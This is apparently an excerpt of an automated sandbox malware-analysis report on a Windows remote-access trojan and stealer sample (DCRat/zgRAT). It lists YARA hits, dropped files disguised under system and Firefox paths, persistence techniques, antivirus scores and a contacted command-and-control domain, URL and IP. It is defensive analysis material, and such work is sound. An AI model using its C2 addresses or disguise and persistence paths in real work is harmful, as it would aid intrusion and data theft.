                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeQueries volume information: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe VolumeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeQueries volume information: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe VolumeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeQueries volume information: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe VolumeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeQueries volume information: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeQueries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeQueries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeQueries volume information: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe VolumeInformation
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeQueries volume information: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeQueries volume information: C:\Users\user\Desktop\UuIspZT5b6.exe VolumeInformation
                          Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformation
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UuIspZT5b6.exe PID: 6996, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UuIspZT5b6.exe PID: 6996, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: UuIspZT5b6.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.UuIspZT5b6.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts11
                          Windows Management Instrumentation                          		1
                          Scheduled Task/Job                          		111
                          Process Injection                          		233
                          Masquerading                          		OS Credential Dumping21
                          Security Software Discovery                          		1
                          Taint Shared Content                          		11
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Scheduled Task/Job                          		1
                          Scripting                          		1
                          Scheduled Task/Job                          		11
                          Disable or Modify Tools                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media2
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt31
                          Registry Run Keys / Startup Folder                          		31
                          Registry Run Keys / Startup Folder                          		131
                          Virtualization/Sandbox Evasion                          		Security Account Manager131
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive12
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		111
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets2
                          File and Directory Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                          Obfuscated Files or Information                          		Cached Domain Credentials114
                          System Information Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Software Packing                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          File Deletion                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1485769 Sample: UuIspZT5b6.exe Startdate: 01/08/2024 Architecture: WINDOWS Score: 100 67 fsin.top 2->67 71 Antivirus detection for dropped file 2->71 73 Antivirus / Scanner detection for submitted sample 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 14 other signatures 2->77 8 UuIspZT5b6.exe 11 33 2->8         started        12 dllhost.exe 2 2->12         started        14 TyCvtMoTOGrwUAEyotiaCQmKvM.exe 2->14         started        16 11 other processes 2->16 signatures3 process4 file5 51 C:\Windows\...\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, PE32 8->51 dropped 53 C:\Windows\...\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, PE32 8->53 dropped 55 C:\Users\user\Desktop\yfmgiIMl.log, PE32 8->55 dropped 57 13 other malicious files 8->57 dropped 83 Creates an undocumented autostart registry key 8->83 85 Creates multiple autostart registry keys 8->85 87 Creates an autostart registry key pointing to binary in C:\Windows 8->87 97 4 other signatures 8->97 18 cmd.exe 8->18         started        20 csc.exe 4 8->20         started        24 powershell.exe 8->24         started        26 8 other processes 8->26 89 Antivirus detection for dropped file 12->89 91 Multi AV Scanner detection for dropped file 12->91 93 Machine Learning detection for dropped file 12->93 95 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->95 signatures6 process7 file8 28 dllhost.exe 18->28         started        43 3 other processes 18->43 49 C:\Windows\...\SecurityHealthSystray.exe, PE32 20->49 dropped 79 Infects executable files (exe, dll, sys, html) 20->79 33 conhost.exe 20->33         started        35 cvtres.exe 1 20->35         started        81 Loading BitLocker PowerShell Module 24->81 45 2 other processes 24->45 37 conhost.exe 26->37         started        39 conhost.exe 26->39         started        41 conhost.exe 26->41         started        47 2 other processes 26->47 signatures9 process10 dnsIp11 69 fsin.top 172.67.203.2, 49730, 49733, 49736 CLOUDFLARENETUS United States 28->69 59 C:\Users\user\Desktop\tznhlkeP.log, PE32 28->59 dropped 61 C:\Users\user\Desktop\lVerBrOi.log, PE32 28->61 dropped 63 C:\Users\user\Desktop\MQZNFpoe.log, PE32 28->63 dropped 65 2 other malicious files 28->65 dropped 99 System process connects to network (likely due to code injection or exploit) 28->99 file12 signatures13

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          UuIspZT5b6.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          UuIspZT5b6.exe55%VirustotalBrowse
                          UuIspZT5b6.exe100%AviraHEUR/AGEN.1323342
                          UuIspZT5b6.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\WkrLeKmp.log100%AviraTR/AD.BitpyRansom.lcksd
                          C:\Recovery\dllhost.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat100%AviraBAT/Delbat.C
                          C:\Users\user\Desktop\MQZNFpoe.log100%AviraHEUR/AGEN.1300079
                          C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe100%Joe Sandbox ML
                          C:\Recovery\dllhost.exe100%Joe Sandbox ML
                          C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\UZVKerGo.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\gSKbOmrW.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\CcvWVetw.log100%Joe Sandbox ML
                          C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe55%VirustotalBrowse
                          C:\Recovery\dllhost.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Recovery\dllhost.exe55%VirustotalBrowse
                          C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe55%VirustotalBrowse
                          C:\Users\user\Desktop\CcvWVetw.log4%ReversingLabs
                          C:\Users\user\Desktop\CcvWVetw.log7%VirustotalBrowse
                          C:\Users\user\Desktop\CkfpANUC.log17%ReversingLabs
                          C:\Users\user\Desktop\CkfpANUC.log29%VirustotalBrowse
                          C:\Users\user\Desktop\MQZNFpoe.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\MQZNFpoe.log22%VirustotalBrowse
                          C:\Users\user\Desktop\UZVKerGo.log8%ReversingLabs
                          C:\Users\user\Desktop\UZVKerGo.log11%VirustotalBrowse
                          C:\Users\user\Desktop\WkrLeKmp.log46%ReversingLabsWin32.Ransomware.Bitpy
                          C:\Users\user\Desktop\WkrLeKmp.log41%VirustotalBrowse
                          C:\Users\user\Desktop\gSKbOmrW.log4%ReversingLabs
                          C:\Users\user\Desktop\gSKbOmrW.log7%VirustotalBrowse
                          C:\Users\user\Desktop\lVerBrOi.log8%ReversingLabs
                          C:\Users\user\Desktop\lVerBrOi.log11%VirustotalBrowse
                          C:\Users\user\Desktop\pfMyjKNB.log17%ReversingLabs
                          C:\Users\user\Desktop\pfMyjKNB.log29%VirustotalBrowse
                          C:\Users\user\Desktop\tznhlkeP.log46%ReversingLabsWin32.Ransomware.Bitpy
                          C:\Users\user\Desktop\tznhlkeP.log41%VirustotalBrowse
                          C:\Users\user\Desktop\yfmgiIMl.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\yfmgiIMl.log22%VirustotalBrowse
                          C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe55%VirustotalBrowse
                          C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe55%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          fsin.top1%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://nuget.org/NuGet.exe0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
                          https://contoso.com/License0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://aka.ms/pscore680%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          http://fsin.top/javascriptCentraldownloads.php0%Avira URL Cloudsafe
                          https://github.com/Pester/Pester0%Avira URL Cloudsafe
                          http://fsin.top/javascriptCentraldownloads.php1%VirustotalBrowse
                          https://github.com/Pester/Pester1%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          fsin.top
                          		172.67.203.2
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://fsin.top/javascriptCentraldownloads.phptrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUuIspZT5b6.exe, 00000000.00000002.1812160907.000000000343D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.203.2
                          		fsin.topUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1485769
                          Start date and time:2024-08-01 07:36:10 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 10s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:56
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
